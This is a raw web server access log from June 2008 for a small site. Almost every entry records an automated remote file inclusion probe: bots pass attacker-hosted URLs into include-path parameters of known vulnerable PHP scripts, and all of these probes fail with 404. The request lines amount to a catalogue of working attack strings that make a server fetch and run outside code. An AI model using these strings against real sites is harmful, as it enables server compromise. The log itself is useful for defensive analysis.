87.230.21.32 - - [01/Jun/2008:18:35:22 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:36:02 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:36:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:36:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:49 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:49 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:49 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:49 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:49 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:50 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:50 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:50 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:51 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:51 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:52 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:36:53 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:36:55 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:36:55 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:37:26 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:37:26 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.neighborhoodglimpses.com"
62.163.140.46 - - [01/Jun/2008:18:37:32 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.163.140.46 - - [01/Jun/2008:18:37:32 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:38:31 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:38:31 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:41 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:42 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:42 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:43 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:44 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:44 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:44 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:44 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:38:44 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:47 -0700] "GET /logs/access_071119.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:48 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:48 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:50 -0700] "GET /logs/access_080211.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:50 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:18:38:51 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:39:24 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:18:39:24 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:18:39:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.27.110.65 - - [01/Jun/2008:18:40:35 -0700] "GET /logs/access.log/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.27.110.65 - - [01/Jun/2008:18:40:35 -0700] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.27.110.65 - - [01/Jun/2008:18:40:35 -0700] "GET /logs/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
62.75.184.73 - - [01/Jun/2008:18:43:06 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.75.184.73 - - [01/Jun/2008:18:43:06 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.75.184.73 - - [01/Jun/2008:18:43:07 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
74.222.17.2 - - [01/Jun/2008:18:43:10 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.neighborhoodglimpses.com"
74.222.17.2 - - [01/Jun/2008:18:43:10 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:43:24 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:43:24 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:44:01 -0700] "GET /logs/access_080310.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:44:01 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:44:02 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:44:06 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:44:06 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:44:24 -0700] "GET /logs/access_080310.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:44:24 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:44:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:47:18 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:47:18 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:47:18 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.2.100.138 - - [01/Jun/2008:18:47:39 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
62.2.100.138 - - [01/Jun/2008:18:47:39 -0700] "GET //auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:48:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:48:56 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:18:51:53 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:18:51:53 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:52:04 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:18:52:05 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:17 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:18 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:18 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
65.55.232.23 - - [01/Jun/2008:18:52:20 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:44 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:44 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:52:44 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:52:53 -0700] "GET /logs/access_080225.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:52:54 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:52:54 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:18:53:13 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
87.106.10.53 - - [01/Jun/2008:18:53:13 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
64.13.224.83 - - [01/Jun/2008:18:53:18 -0700] "GET /logs/access_080128.log//auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.13.224.83 - - [01/Jun/2008:18:53:18 -0700] "GET //auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.13.224.83 - - [01/Jun/2008:18:53:18 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.140.135.103 - - [01/Jun/2008:18:54:20 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.140.135.103 - - [01/Jun/2008:18:54:20 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:54:21 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:54:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:54:32 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:55:20 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:55:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:55:26 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:56:01 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
201.76.146.32 - - [01/Jun/2008:18:56:03 -0700] "GET /logs/access.log/plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
201.76.146.32 - - [01/Jun/2008:18:56:04 -0700] "GET /plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
201.76.146.32 - - [01/Jun/2008:18:56:04 -0700] "GET /logs/plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:56:40 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:56:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:56:51 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:18:58:22 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:18:58:22 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.250.121.2 - - [01/Jun/2008:18:58:58 -0700] "GET /plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
